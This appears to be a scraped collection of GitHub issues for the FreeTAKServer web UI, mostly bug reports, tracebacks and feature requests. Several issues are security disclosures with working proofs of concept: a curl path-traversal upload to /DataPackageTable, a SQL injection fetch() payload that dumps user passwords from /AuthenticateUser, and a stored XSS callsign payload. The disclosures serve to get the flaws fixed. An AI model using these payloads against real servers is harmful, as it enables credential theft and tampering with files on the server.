freetakteam / ui Goto Github PK

the following methods need to be implemented

• create federation( fixed with commit 7920319)
• delete federation
• change federation status

“This has been explained many times before: you have the wrong IP in your configuration. Now if you don't know what an internal IP is the easiest way is to use a digital ocean install. In other case, read this forum and the docs.”

The message should be brief and provide a stable link into the documentation.

When connecting to the UI the browser reaches out to multiple domains. If you have no internet connection (likely scenario) then these calls will hang then fail rendering the UI unworkable in this scenario.

The domains are:

https://cdn.jsdelivr.net/npm/apexcharts
https://fonts.googleapis.com/css?family=Poppins:200,300,400,600,700,800
https://use.fontawesome.com/releases/v5.0.6/css/all.css
https://cdn.socket.io/socket.io-1.4.5.js

There are cases where the FTS-UI is misconfigured.
There is documentation explaining how to correct the configuration.
Cause the FTS-UI to catch the mis-configuration exception and direct the operator to the appropriate documentation.

Here is one such place where a connection exception is probably caused by such a mis-configuration:

  File "/root/fts.venv/lib/python3.11/site-packages/FreeTAKServer-UI/app/base/routes.py", line 42, in login
    user = requests.get(f"{app.config['PROTOCOL']}://{app.config['IP']}:{app.config['PORT']}/AuthenticateUser", params={"username": username, "password": password}, headers={"Authorization": f"{app.config['APIKEY']}"})

[enhancement]
Might be a good 'nanny' feature to force admin password change on first login to UI.
I realize that one should just do it right away, but I can count 11+ servers out there in the wild that have left their default creds wide open presently.
Not sure if this belongs in the UI git or here. I can move it if need be.

User Interface Datapackage

From the WebUI it is possible to (once logged in) upload DataPackages directly to the server so that it is possible to download the zipped files on the EUD in the field.
The route /DataPackageTable takes an argument ?filename= which is not sanitized for either the Path or the Filename outside of the UI, which creates the issues that you can place any file, anywhere on the system. Albeit going this route will add some junk XML data into the end of the file, this making it extremely hard to achieve code execution through Python or Flask Templating.
This was achieved using a transparent proxy to catch and modify the webrequest, but can also be achieved using something like Curl

Proof Of Concept

Request through Burpsuite:

File on system:

(Note that the webserver is at that moment run as root, Not Recommended)

Bash equivalent PoC:

curl -i -s -k -X POST -H 'Host: atak.FreeTAKServer.com:19023' -H 'Authorization: Bearer ValidRestAPIToken' -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOUUxfHjKyflBjjhn' -H 'Accept-Encoding: gzip, deflate' --data-binary '------WebKitFormBoundaryOUUxfHjKyflBjjhn\x0d\x0aContent-Disposition: form-data; name=\"assetfile\"; filename=\"test.ext\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aThisIs FromDataPackageTable\x0d\x0a\x0d\x0a------WebKitFormBoundaryOUUxfHjKyflBjjhn--\x0d\x0a' 'http://atak.FreeTAKServer.com:19023/DataPackageTable?filename=../../../../../../../../tmp/file.ext&creator='

currently trying to create a user with a username or password that includes special charachters will result in a failure to login.

Given the current security issues for authenticated users, we should add a default TLS option for users to prevent MITM and sniffing attacks.

I have a text bug on a fresh installation.

Package 1 is generated by the UI (created a FTSUser package to give right to access SSL)
Package 2 is uploaded from ATAK
As you can see, the name is unintelligible on the UI.
If i want to redownload the package from the server, the name is correctly written on the interface.

Support : Raspberry Pi 5 8Go
OS : Raspberry Pi OS (64-bit) / Debian Linux 12
Python: 3.11
FTS version : 2.1

Installation of FTServer was done following : https://freetakteam.github.io/FreeTAKServer-User-Docs/Installation/Linux/Service/
No customs modifications. Pip check FreeTAKServer resulted in "No broken requirements found."

UI project will need to have a Dockerfile created.

In addition to getting the Dockerfile created and building valid images, GitHub actions will need to be created to build images on each push of a branch and merge to master.

FTS 2.1 RC1, UI 2.1

Clean install from ZTI. I am unable to add or delete files under the Data Package section. I can select a file to upload, but errors out saying 'Add Datapackage failed. Contact administrator'. If I try to delete a file, it says successful but the file remains.

Currently the Web UI allows for adding and deleting data packages. As a server is used more, the number of data packages could increase significantly with data packages for general overlays, grgs, and specific mission plans, etc.

The ability to rename data packages would be beneficial to the ops/mission manager to ensure the data is sensibly ordered, and would benefit the client users when searching for the relevant dp to download.

I just succeeded in installing the FTS and UI a,d Isee them via the browser 👍.
Thanks for your efforts on this system.

I'm bumping into an error page navigating to the /mission url.
I'm not sure if I did not configure correctly or something is wrong?

The code

The code looks as followed:
excheck_json_data = excheck_json_data['data'][0]['contents']

However the logs say that excheck_json_data looks like this:
{'ExCheck': {'Templates': [], 'Checklists': []}}

The error looks like this:

  File "/usr/local/lib/python3.8/dist-packages/FreeTAKServer-UI/app/home/routes.py", line 69, in missionApi
    excheck_json_data = excheck_json_data['data'][0]['contents'],
KeyError: 'data'

Details of my setup:

Fresh install (Ubuntu on google cloud)
[FTS SERVER INFO]
FreeTAKServer-2.0.69

[UI SERVER INFO]
Version 2.1

[UP TIME]
1H 9M 17S

Description:

This branch is meant to align the changes to FTS in order to fix the QR code generation.

FTS Branch: FreeTAKTeam/FreeTakServer#687

currently emergencies cannot be selected or deleted

when downloading a DataPackage the name of the download needs to be equivelant to that of the DataPackage ie: user downloads DataPackage hello.txt datapackage name should be hello.txt

Running the FTS update command, <Pip install --upgrade freetakserver[UI]> results in overwriting of the user's config.py file and thus the loss of the user's customized settings for IP address assigned to FTS and FTS-UI.

• Work around: User must reedit the config file (/root/fts.venv/lib/python3.11/site-packages/FreeTAKServer-UI/config.py) with their desired FTS IP address setting.

both the IP and port need to be moved out to variables

This would only reach to as far as uploading your own certs, regenerating the current ones (with difference settings like expiry time) or downloading them.

This would save people the need to SCP files onto the server

On my ubuntu 20.04 system, the FTS UI shows an incorrect negative uptime that obviously has UTC offset messing up the math.

My location us UTC-5, with the timezone on my system set to UTC I see the following output:

[UP TIME] [START TIME]
-5H -59M -24S 27/12/2021 23:12

Clearly one of the methods of accessing the time is using UTC and the other isn't.
The settings on Linux show:
:~$ timedatectl
Local time: Mon 2021-12-27 23:24:11 UTC
Universal time: Mon 2021-12-27 23:24:11 UTC
RTC time: Mon 2021-12-27 23:24:12
Time zone: UTC (UTC, +0000)
System clock synchronized: yes
NTP service: active
RTC in local TZ: no

If I set the timezone on my box to the actual local timezone for my system, the display is correct.

Follow the footsteps of FTS core and update the current old setup.py to be managed in a modern toml.

This should allow the multiple requirements files to be removed.

The API endpoint /AuthenticateUser contains a SQL Injection into the SQLite3 Database that is handling the authentication process of the SystemUsers. In order to exploit this vulnerability the attacker need to possess a valid API key, which can either be leaked through the XSS from an End User Device, or given as a part of the UAV Operator ability which broadcasts the GPS and Video feed of a UAV-Drone.
From the SQL Injection it is possible to list all the Username, UsedID and Clear-Text passwords in the database.

Proof of Concept

Posting the follwing snippet into a web browsers console will trigger the SQL Injection and return the name and password for each user in the SystemUsers table.

fetch("http://atak.FreeTAKServer.com:19023/AuthenticateUser?username=abc\" UNION SELECT (SELECT group_concat(name||':'||password) FROM SystemUser),'b','c','PASSWORD','d','e'--&password=PASSWORD", {
    "headers": {
      "accept": "*/*",
      "accept-language": "en-US,en;q=0.9",
      "authorization": "Bearer ValidAPIKey",
      "content-type": "application/json"
    },
    "mode": "cors"
  });

Will return the following response:

Which clearly shows the database results in clear-text.

Add a Docker image build to the release pipeline, tag it with the release version and publish it to Docker Hub.

Hi, can we add a simple socket client feature to the connect page on the FreeTAKServer ?
Example use such as a user testing XML TCP posts to the server to see if their code is working also for testing behaviour by sending custom XML code.

Python Example:

import socket

UDP_IP = '10.0.0.60' #127.0.0.1
UDP_PORT = 8087 #5005
MESSAGE = '<?xml version="1.0"?><event version="2.0" uid="TestSign" type="a-f-G-U-C" how="m-g" start="2021-03-30T10:31:41.042Z" time="2021-03-30T17:31:41.042Z" stale="2021-03-30T17:37:56.042Z"><detail><contact callsign="TestSign"/><__group name="Blue" role="Team Lead" /></detail><point le="9999999.0" ce="5.0" hae="217.88824764640728" lon="-0.665562" lat="54.019611" /></event>'

# Create a socket (SOCK_STREAM means a TCP socket)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    # Connect to server and send data
    sock.connect((UDP_IP, UDP_PORT))
    sock.sendall(bytes(MESSAGE + "\n", "utf-8"))

    # Receive data from the server and shut down
    received = str(sock.recv(1024), "utf-8")
# Print and handle data how you want
print("Sent:     {}".format(MESSAGE))
print('\n')
print("Received: {}".format(received))

Features can be added as it grows and having this built in will add value to the user/testers experience.

Card Example:

The following comments are from a comment that I made on FreeTAKTeam/FreeTakServer#324. I went on a bit of a rant in that issue before I realized that I was going into a lot of things that did not pertain to the problem that FreeTAKTeam/FreeTakServer#324 was filed against (although their are some related items).

It has taken me a bit longer to make the time to create an issue concerning some of the things I was going off on and after contemplating where the problem is I think that most of the problem resides in the UI code. Hence this issue.

So from my comment in that issue:

So digging into the current code branches for FreeTAKServer and FreeTAKServer-UI it is mounting to the frustration level that there are 2 different methods for configuration. The two projects are closely related--why are there different configuration methods?

....

In FreeTAKServer it is configured by reading in a YAML file (/opt/FTSConfig.yaml) and there is no entry that appears to be equivalent to SECRET_KEY. So yes, this still seems to be a problem with the current code bases. Which begs the question of how the software ever made it to the point of release without full integration testing which should have caught the problem of missing config values.

Now, I may be missing something. I have only been working trying to get working copies of the software for a couple of hours. Forgive me if I am missing something. Yet given what I have seen thus far and problems that should not have made it to a release and complexities of configuring the software, I am compelled to give up and just run the official TAK server.

A bit of these comments are a little bit more specific to FreeTAKTeam/FreeTakServer#324, but I think it provides some of the context for this issue.

I should also state that I have submitted a PR (FreeTAKTeam/FreeTakServer#376) to rework the configuration module in the FreeTAKServer code and I am thinking that something similar should be done for the UI code.

The way that the UI code gets configured is to set all the values statically in a Python file that gets read in when the code starts up. While that is great for having the configuration already processed, it is really a bad experience for trying to run the code in different environments or if there needs to be a different configuration used on some occasion.

In my case I was trying to get the Docker version of FreeTAKServer running and having two different configuration mechanisms in the same Docker container is a bit of a nightmare. Actually, the existing Docker container does not seem to have any real configuration of the UI code that can be done.

I would suggest that the UI code be changed to read in a YAML file similar to the one used for FreeTAKServer. Actually the same config could/should be used. Since some of the values (specifically several of the network addressing settings) are used by both code bases it would make sense to use the same key values for both projects.

This would allow a single configuration file to be created and fed to both services (if they are running on different machines) or if both services are running in the Docker or similar environment then the configuration is just passed in once.

currently trying to turn a service off or on has no effect this needs to be fixed

How can we adjust the port for the UI so we can access its fully use off the main system?

I would like to add/remove users from my connection on let's say my cellphone durning times I'm not near my machine. And add/remove data packages on the Mission Screen.

Or if there is already a solution please advise.

As it stands this is basically a Read-Only access.

Thank you

Currently the Web UI displays the number of connected users only. A dedicated page to display user details would be beneficial to the ops/mission manager.

Maybe instead of Team and Role, the icon similar to that seen in the client can be displayed.

The table would ideally have the ability to be ordered on the obvious columns like e.g. Callsign or Team.

A thorough and well implemented server; thanks guys.

Yesterday I was experimenting with Free TAK Server in AWS, I currently have it setup so it accessed by it's public IP, I have setup the correct security group rules evidenced by the fact that I am able to connect from my Andriod Device App. The problem is with the UI, I am able to accesses and login with the default admin credentials however UI App is unable to communicate with the FTAK server.

Firefox Console reports a CORS issue, Chrome Console reports Connection Refused.

Just to be clear apps are running on same server and I used the first start wizard to setup.

I have experimented with the config.py currently I have:

# this IP will be used to connect with the FTS API
IP = 'Set as local IP Server is FTAK Running on'
# the public IP your server is exposing
APPIP = '0.0.0.0'

I think this may be the problem, where I have tried to set APPIP to the public IP I am using however I am unable to as I am unable to start the UI as I receive the following error:

File "/usr/local/lib/python3.8/dist-packages/FreeTAKServer-UI/run.py", line 107, in <module>
    wsgi.server(sock = eventlet.listen((app_config.APPIP, app_config.APPPort)), site=app)
  File "/usr/local/lib/python3.8/dist-packages/eventlet/convenience.py", line 78, in listen
    sock.bind(addr)
OSError: [Errno 99] Cannot assign requested address

I'm hoping this is a bug and I've not missed something vital in the Documentation.

Would be real nice if there was a way to view connected clients and pertinent data about them in real-time.
Doesn't need to be as extensive as TAK Server, just some basics, such as call sign, TAK client version, and last report would be very useful.
Just for reference, the complete list that TAK Server shows is: Health, Callsign, Username, DN, Groups, Last Report, TAK client Version, Role, Team, IP address, Pending writes, Processed, Protocol, XPath, UID, Subscription. Again, not all of that is necessary, it's just what has been out there.
It appears that something like this was listed on the roadmap at 1.4.
A nice value-add would be if one of the fields was current location with a link to that PLI on the webmap.

All, I'm relatively new to the FTS configuration (have been working with the GOV version of TAK server for a while), and have been running into issues using the current version of the UI (1.8.1) in any new installations (Windows, Ubuntu, Debian) in either a VM instance or directly on physical machine (the Docker version works very well; however, it is based on FTS 1.7.5 which does not support the video features that my organization needs). I continue to encounter issues with the UI installation, which I will try to summarize (the documentation online is fragmented, which is understandable for such a project, and seems based on 1.7.5 FTS and 1.5.1 UI).

1. WTforms does not seem to be properly called in the UI, which prevented the service from ever starting properly when calling run.py. (this was corrected by replacing all instanced of "TextField" in /usr/local/lib/python3.8/dist-packages/FreeTAKServer-UI/app/base/forms.py with "StringField").
2. After correcting the above and playing with the IP address fields in config.py and MainConfig.py, I was able to get the UI to start and display a login page. For the life of me, I can not figure if there is a valid user already created, or if there is a missed configuration item somewhere. Any attempt to login results in the following error:

`Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 159, in _new_conn
conn = connection.create_connection(
File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 84, in create_connection
raise err
File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 74, in create_connection
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 387, in _make_request
conn.request(method, url, **httplib_request_kw)
File "/usr/lib/python3.8/http/client.py", line 1252, in request
self._send_request(method, url, body, headers, encode_chunked)
File "/usr/lib/python3.8/http/client.py", line 1298, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "/usr/lib/python3.8/http/client.py", line 1247, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "/usr/lib/python3.8/http/client.py", line 1007, in _send_output
self.send(msg)
File "/usr/lib/python3.8/http/client.py", line 947, in send
self.connect()
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 187, in connect
conn = self._new_conn()
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 171, in _new_conn
raise NewConnectionError(
urllib3.exceptions.NewConnectionError: <urllib3.connection.HTTPConnection object at 0x7f9f51e83370>: Failed to establish a new connection: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
retries = retries.increment(
File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 436, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='0.0.0.0', port=19023): Max retries exceeded with url: /AuthenticateUser?username=admin&password=password (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f9f51e83370>: Failed to establish a new connection: [Errno 111] Connection refused'))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/local/lib/python3.8/dist-packages/eventlet/wsgi.py", line 573, in handle_one_response
result = self.application(self.environ, start_response)
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 2464, in call
return self.wsgi_app(environ, start_response)
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 2450, in wsgi_app
response = self.handle_exception(e)
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 1867, in handle_exception
reraise(exc_type, exc_value, tb)
File "/usr/local/lib/python3.8/dist-packages/flask/_compat.py", line 39, in reraise
raise value
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 2447, in wsgi_app
response = self.full_dispatch_request()
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 1952, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 1821, in handle_user_exception
reraise(exc_type, exc_value, tb)
File "/usr/local/lib/python3.8/dist-packages/flask/_compat.py", line 39, in reraise
raise value
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 1950, in full_dispatch_request
rv = self.dispatch_request()
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 1936, in dispatch_request
return self.view_functionsrule.endpoint
File "/usr/local/lib/python3.8/dist-packages/FreeTAKServer-UI/app/base/routes.py", line 42, in login
user = requests.get(f"http://{app.config['IP']}:{app.config['PORT']}/AuthenticateUser", params={"username": username, "password": password}, headers={"Authorization": f"{app.config['APIKEY']}"})
File "/usr/lib/python3/dist-packages/requests/api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 533, in request
resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 646, in send
r = adapter.send(request, **kwargs)
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 516, in send
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPConnectionPool(host='0.0.0.0', port=19023): Max retries exceeded with url: /AuthenticateUser?username=admin&password=password (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f9f51e83370>: Failed to establish a new connection: [Errno 111] Connection refused'))`

I am supporting a disaster response exercise in a few weeks and would like to have version 1.9.1.5 functional so that we can use the much-needed video streaming feature. Your insight and assistance would be appreciated.

the UI contains code that would let the certs fail in 2.0

https://github.com/FreeTAKTeam/UI/blob/master/FreeTAKServer-UI/config.py

In the FreeTAKServer-UI there is a function to create and view Emergency Alerts that are originating from either the End User Device or from the UI itself. Both Avenues are susceptible to a Stored Cross Site scripting vulnerability in the Callsign parameter.

Web Interface

In the case of a XSS in the WebUI it is as simple as having a callsign with the payload of <img src onerror=alert(/payload/)> which will trigger the Emergency function and display the emergency in the WebUI.

End User Device

What's more interesting of a scenario is that it is possible to push Emergencies from any of the EUDs, these can range from a 911, TIC (Troops in Contact) or similar.

This can be chained together with the API keys leakage in the response in order to obtain a server RestAPI key for further exploitation, which can take a normal user in the field to a Web Server admin

The Events button is currently inactive. It should provides a list of the last 5 events.

grep - r 1.9.5 UI-1.9.8/*
...
UI-1.9.8/FreeTAKServer-UI/app/init.py: app.config['UIVERSION'] = '1.9.5'
Binary file UI-1.9.8/FreeTAKServer-UI/tests/chromedriver matches
UI-1.9.8/setup.py: version='1.9.5',

The web application displays the incorrect version on the about screen as well.

[UI SERVER INFO]
Version 1.9.5
192.168.2.124:5000

Comments in the app/init.py file imply that the 1.9.5 is actually a database version number. It's very confusing to have the DB version displayed as the web UI code version - it seems like it's not right.

Currently, the WebUI doesn't seem to be very rproxy friendly. It needs to be told the IP for the API(?) in the environment variable IP. The UI then only connects back to this IP. As a consequence, the UI cannot be multihomed and it cannot be accessed through a reverse proxy. That makes life quite hard for admins who like to run FTS in a secure way in a docker environment behind a reverse proxy, even more so if it should handle SSL encryption.

Finally figured out the config to get the Web UI not to throw errors at me. Now I'm trying to login with the default "admin" & "password" for the first login. It tells me "wrong user or password." I've looked inside FTSServer-UI.db and don't see ANY login information. I've been trying to look through the code on here to see where the initial username and password is set, but I can't find it. The output is:

(55296) wsgi starting up on http://192.168.50.XXX:5000
(55296) accepted ('192.168.50.XX', 2307)
(55296) accepted ('192.168.50.XX', 2308)
192.168.50.XX - - [12/Sep/2022 11:58:09] "GET / HTTP/1.1" 302 406 0.009471
192.168.50.XX - - [12/Sep/2022 11:58:09] "GET /login HTTP/1.1" 200 10981 0.033868
192.168.50.XX - - [12/Sep/2022 11:58:09] "GET /static/assets/css/jarvis.css?r=78 HTTP/1.1" 200 4815 0.002203
192.168.50.XX - - [12/Sep/2022 11:58:09] "GET /static/assets/css/jarvis_red.css?r=92 HTTP/1.1" 200 4867 0.001406
(55296) accepted ('192.168.50.XX', 2309)
(55296) accepted ('192.168.50.XX', 2310)
192.168.50.XX - - [12/Sep/2022 11:58:09] "GET /static/assets/css/jarvis_grey.css?r=2 HTTP/1.1" 200 4917 0.001352
192.168.50.XXX - - [12/Sep/2022 11:58:09] "GET /static/assets/css/global.css?r=94 HTTP/1.1" 200 23760 0.001249
Starting new HTTP connection (1): 192.168.50.XXX:8080
http://192.168.50.XXX:8080 "GET /AuthenticateUser?username=admin&password=password HTTP/1.1" 404 232
192.168.50.XX - - [12/Sep/2022 11:58:13] "POST /login HTTP/1.1" 200 10874 0.012816
192.168.50.XX - - [12/Sep/2022 11:58:13] "GET /static/assets/css/jarvis_red.css?r=49 HTTP/1.1" 200 4867 0.001497
192.168.50.XX - - [12/Sep/2022 11:58:13] "GET /static/assets/css/jarvis.css?r=12 HTTP/1.1" 200 4815 0.001263
192.168.50.XX - - [12/Sep/2022 11:58:13] "GET /static/assets/css/global.css?r=8 HTTP/1.1" 200 23760 0.001427
192.168.50.XX - - [12/Sep/2022 11:58:13] "GET /static/assets/css/jarvis_grey.css?r=98 HTTP/1.1" 200 4917 0.001757

XX is the client and XXX is the server. I am using it unsecure (for now). I installed from pip using the latest release.

Flask, wtforms, and sqlalchemy are capped due to some deprecated functions.

Update code to play nice with the replacements and allow us to use modern versions.

excheck multiple select doesnt work
excheck add template needs to be implemented
excheck delete template needs to be implemented

Hi,
I noticed a small bug where when the exception for a user which exists is triggered the left navigation drawer menu is exposed with clickable buttons.

Also when attempting to create an account on the FreeTAKServer , clicking the register button presents what looks like a SQL error. See the images below:

User exists bug:

Create an account error:

snackbar notification needs to be sent when a service is changed in the configuration page. @aalamsoft

Would be most excellent if the LOGS feature on the /index page of the UI was working, and was configurable to filter, sort, or identify event types, time stamps, and logins.
Example event types I would be most interested in would be user (EUD) connections and admin (UI) connections. Any admin type events in the UI would be nice, such as created/deleted-data-package, created/deleted-user, enabled/disabled mission, enabled/disabled TCP & HTTP-DP, etc.

The WebUI leaks the RestAPI and Websocket tokens in the javascript source code! These should not be reflected back to the user as that can lead to unintended requests through for example XSS.

API Bearer Token

Websocket Token